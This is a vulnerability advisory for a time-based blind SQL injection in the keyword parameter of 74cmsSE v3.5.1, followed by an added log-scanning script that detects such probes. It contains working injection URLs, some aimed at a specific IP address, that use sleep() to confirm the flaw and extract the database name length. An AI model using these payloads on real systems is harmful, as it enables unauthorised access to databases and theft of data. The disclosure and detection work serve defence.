Exploit Title: SQL Injection vulnerability on 74cmsSE_v3.5.1
Date of Discovery: 21/4/2022
Product version: 74cmsSE_v3.5.1
Download link:http://www.74cms.com/downloadse/show/id/68.html
Vulnerability Description:
74cmsSE_v3.5.1 has a time-based blind SQL injection that allows an attacker to run malicious SQL statements against the database, which can be exploited to execute unauthorized SQL commands and obtain sensitive database data.
POC:
Payload:
/v1_0/home/resume/index?__r=1&district1=&district2=&district3=&education=&experience=&keyword=/%27%2B(select%20if(now()=sysdate(),sleep(2),0))%2B%27/&major=&maxage=&maxwage=&minage=&minwage=&page=1&pagesize=10&settr=&sex=&tag=
In the path:
/v1_0/home/resume/index
the $keyword parameter is not strictly filtered, resulting in SQL injection.
exp1:
http://124.223.95.129:8766/v1_0/home/resume/index?__r=1&district1=&district2=&district3=&education=&experience=&keyword=/*%27%2B(select%20if(now()=sysdate(),sleep(2),0))%2B%27*/&major=&maxage=&maxwage=&minage=&minwage=&page=1&pagesize=10&settr=&sex=&tag=
As you can see from the figure above, the sleep() function is executed, so there is a time-based blind SQL injection.
With the payload test above, it is possible that the sleep() function is executed twice.
The time-based blind can be used to determine the length of the database name:
exp2:
http://124.223.95.129:8766/v1_0/home/resume/index?__r=1&district1=&district2=&district3=&education=&experience=&keyword=/*%27%2B(select%20if(now()=sysdate(),sleep(length(database())),0))%2B%27*/&major=&maxage=&maxwage=&minage=&minwage=&page=1&pagesize=10&settr=&sex=&tag=
As shown in the following figure, we know through the arbitrary file read vulnerability that the database name of the website is "qscms2", and the delay is exactly double the length of database(), so the injection is successful.

It's a time-based SQL injection.
Suggestion: add a filter function to this parameter.
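Added example (not part of the original report): a small log-scanning check that flags requests to this endpoint whose query parameters carry the time-delay expressions used above, and marks the ones with a slow response, so that an operator can detect this probing in access logs while the parameter filter is being added. The log lines are constructed, and the trailing request-time field in milliseconds is an assumed log format.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote_plus

# Constructed sample access-log lines (not taken from the report). Assumed format:
# combined log prefix followed by status, size and request time in milliseconds.
SAMPLE_LOG = """\
10.0.0.5 - - [21/Apr/2022:10:00:01 +0000] "GET /v1_0/home/resume/index?__r=1&keyword=java&page=1&pagesize=10 HTTP/1.1" 200 512 2
10.0.0.9 - - [21/Apr/2022:10:00:07 +0000] "GET /v1_0/home/resume/index?__r=1&keyword=/*%27%2B(select%20if(now()=sysdate(),sleep(2),0))%2B%27*/&page=1&pagesize=10 HTTP/1.1" 200 512 4012
10.0.0.9 - - [21/Apr/2022:10:00:15 +0000] "GET /v1_0/home/resume/index?__r=1&keyword=/*%27%2B(select%20if(now()=sysdate(),sleep(length(database())),0))%2B%27*/&page=1&pagesize=10 HTTP/1.1" 200 512 12040
"""

# Time-delay functions and the now()=sysdate() condition seen in the payloads above.
SQLI_TIME_PATTERN = re.compile(
    r"\b(?:sleep|benchmark|pg_sleep)\s*\(|now\(\)\s*=\s*sysdate\(\)", re.IGNORECASE)

LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" '
    r'(?P<status>\d{3}) (?P<size>\d+) (?P<ms>\d+)$')


def scan_line(line, slow_ms=2000):
    """Return a finding dict if any query parameter contains a time-delay expression."""
    m = LOG_LINE.match(line)
    if not m:
        return None
    url = urlsplit(m.group("target"))
    params = parse_qs(url.query, keep_blank_values=True)
    ms = int(m.group("ms"))
    for name, values in params.items():
        for value in values:
            # parse_qs decodes once; decode again to catch double-encoded values.
            hit = SQLI_TIME_PATTERN.search(unquote_plus(value))
            if hit:
                return {"ip": m.group("ip"), "path": url.path, "param": name,
                        "indicator": hit.group(0), "response_ms": ms,
                        "slow": ms >= slow_ms}
    return None


def scan_log(text, slow_ms=2000):
    """Scan a whole log text and return the list of findings."""
    return [f for f in (scan_line(l, slow_ms) for l in text.splitlines()) if f]


if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(finding)
```

A response time well above the baseline for the same path, combined with a flagged parameter, is the signal to act on; the pattern alone also catches probes that the database did not actually delay.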